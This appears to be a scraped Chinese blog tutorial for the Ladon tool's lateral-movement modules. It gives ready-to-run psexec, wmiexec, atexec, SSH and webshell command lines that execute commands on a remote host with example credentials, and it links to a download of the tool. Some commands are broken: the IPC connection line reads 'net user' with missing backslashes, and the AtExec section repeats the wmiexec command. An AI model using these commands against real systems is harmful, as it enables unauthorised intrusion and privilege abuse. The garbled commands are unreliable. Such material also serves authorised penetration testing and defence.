zoukankan      html  css  js  c++  java

  • 〖教程〗Ladon内网横向移动Wmiexec/psexec/atexec/psexec/webshell

    前言

    在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M,传4个不得20M?基于以上原因,Ladon添加常用的远程执行命令功能,6.5体积仅844K就包含以上工具功能,扫描到相关密码,即可使用对应模块横向移动,一站式工具,完美一条龙服务。

    Ladon远程执行命令

    PSEXEC交互式回显

    需先连接IPC,然后再通过psexec执行命令,类似psexec需445端口

    net user \192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authoritysystem

    image

    WmiExec非交互回显

    并非所有机器都允许连接445端口,所以可通过135端口执行命令

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

    image

    AtExec非交互回显

    通过sctask命令执行,可以SYSTEM权限或对应用户执行命令,需445端口
    但是以用户权限执行命令需要远程机器登陆对应用户

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

    image

    SshExec非交互回显

    一般开放SSH服务的有Linux系统,网络设备等,默认为22端口

    Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

    image

    JspShell非交互回显

    支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

    Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

    image

    WebShell非交互回显

    支持7种脚本(jsp asp php aspx cfm py perl),3种类型WebShell(cd ua k8)
    支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

    Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

    image

    工具下载

    最新版本:https://k8gege.org/Download/Ladon.rar
    历史版本: https://github.com/k8gege/Ladon/releases
  • 相关阅读:
    汇编--立即数
    java mysql常用函数大全
    java springboot@GeneratedValue 注解
    java list.stream().map().collect(Collectors.toList())
    java 一种树的写法
    怎么查看当前进程?怎么执行退出?怎么查看当前路径?
    垃圾回收的优点和原理,并考虑2种回收机制?
    du 和 df 的定义,以及区别?
    通过什么命令查找执行命令?
    终端是哪个文件夹下的哪个文件?黑洞文件是哪个文件夹下的哪个命令?
  • 原文地址:https://www.cnblogs.com/k8gege/p/12993054.html
Copyright © 2011-2022 走看看